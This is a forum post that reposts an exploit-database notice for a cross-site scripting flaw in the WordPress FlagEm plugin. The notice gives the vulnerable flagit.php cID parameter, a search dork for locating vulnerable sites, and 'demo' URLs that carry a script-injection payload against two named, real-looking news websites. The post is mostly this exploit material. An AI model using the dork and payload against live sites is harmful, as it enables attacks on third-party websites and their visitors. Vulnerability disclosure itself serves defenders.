Jump to content
Byte-ul

WordPress FlagEm Cross Site Scripting

Recommended Posts

Posted

The WordPress FlagEm plugin suffers from a cross site scripting vulnerability.

Authored by IeDb

Source: WordPress FlagEm Cross Site Scripting ? Packet Storm


#################################

# Iranian Exploit DataBase

# http://iedb.ir

#################################

# Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@Gmail.com

# Home : http://iedb.ir

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/plugins/FlagEm/

#################################

# Exploit :

# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]

# Dem0 :

# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

# http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

#################################


# Exploit Archive = http://www.iedb.ir/exploits-269.html

#################################

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...